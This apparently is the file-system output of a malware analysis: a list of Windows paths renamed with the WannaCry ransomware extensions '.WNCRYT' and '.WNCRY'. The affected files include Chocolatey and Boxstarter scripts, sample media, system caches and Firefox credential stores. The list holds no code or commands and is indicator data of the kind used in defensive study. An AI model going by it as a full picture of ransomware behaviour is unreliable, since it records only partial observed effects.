file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd.WNCRYT
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT
file: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT
file: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb.WNCRY
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRY
file: C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\user.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\{1A0A057C-F009-4C89-B7DC-E386BCD2DDFD}.2.ver0x0000000000000002.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001e.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000023.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000025.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\{8396BDEC-CD34-467F-8EB0-706C57B90A2C}.2.ver0x0000000000000002.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\{887A11BA-C40B-40DA-A994-13F5794EDA58}.2.ver0x0000000000000002.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\{B77EA8CB-9C6F-4A20-B584-EAC4FF2DF997}.2.ver0x0000000000000002.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000001.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000002.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000003.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Caches\{ECA0F554-74BF-4F43-9EC2-07E05C31BB3E}.2.ver0x0000000000000001.db.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB.WNCRYT
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT
file: C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRYT
file: C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRYT
file: C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRYT
file: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRYT
file: C:\Users\user\AppData\Local\IconCache.db.WNCRYT
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js.WNCRYT
file: C:\Users\All Users\Boxstarter\BoxStarter.bat.WNCRYT
file: C:\Users\All Users\Boxstarter\NOTICE.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat.WNCRYT
file: C:\Users\All Users\chocolatey\bin\_processed.txt.WNCRYT
file: C:\Users\All Users\chocolatey\config\chocolatey.config.backup.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1.WNCRYT
